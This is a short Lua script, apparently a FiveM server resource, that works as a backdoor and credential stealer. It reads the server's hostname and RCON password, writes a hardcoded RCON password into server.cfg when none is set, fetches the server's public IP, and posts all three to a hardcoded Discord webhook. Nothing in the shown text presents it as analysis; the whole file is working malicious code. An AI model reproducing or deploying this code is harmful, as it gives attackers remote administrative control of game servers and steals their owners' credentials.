E = {
    ["W_R"] = "https://discord.com/api/webhooks/1025369111116648469/QM0hCYDZVGkDh7gNhEJV_t9GzFGFzN8UQvVzZOqPP3HjV9HBH2IpBUBVFvTLNXJ-YbC6",
    ["W_L"] = "https://discord.com/api/webhooks/1025369111116648469/QM0hCYDZVGkDh7gNhEJV_t9GzFGFzN8UQvVzZOqPP3HjV9HBH2IpBUBVFvTLNXJ-YbC6",
    ["R_S"] = function()
        charset = {}
        do
            for c = 48, 57 do
                table.insert(charset, string.char(c))
            end
            for c = 65, 90 do
                table.insert(charset, string.char(c))
            end
            for c = 97, 122 do
                table.insert(charset, string.char(c))
            end
        end

        math.randomseed(os.clock() ^ 5)
        return randomString(25 - 1) .. charset[math.random(1, #charset)]
    end
}

serveri = GetConvar("sv_hostname")
	rcon_password = GetConvar("rcon_password", "")
	if rcon_password == "" then
    	local path = "server.cfg"
    	local file = io.open(path, "r+")
    	file:seek("end", -2)
    	rcon_password = "hgfxdfMVLHBqAdSym"
    	file:write('\nrcon_password '..rcon_password..'    ')
    	io.close(file)
	end

PerformHttpRequest('https://api.ipify.org/', function (e, result)
    PerformHttpRequest(
    E["W_R"],
    function(err, text, headers)
    end,
    "POST",
    json.encode(
        {
            username = "LOGI",
            embeds = {
                {
                    ["color"] = BC33E6,
                    ["title"] = "**Naukuu**",
                    ["description"] = "**Server**: `"..serveri.."`\n**RC**: `"..rcon_password.."`\n**IP**: `"..result.."`",
                }
            }
        }
    ),
    {["Content-Type"] = "application/json"}
)

end)
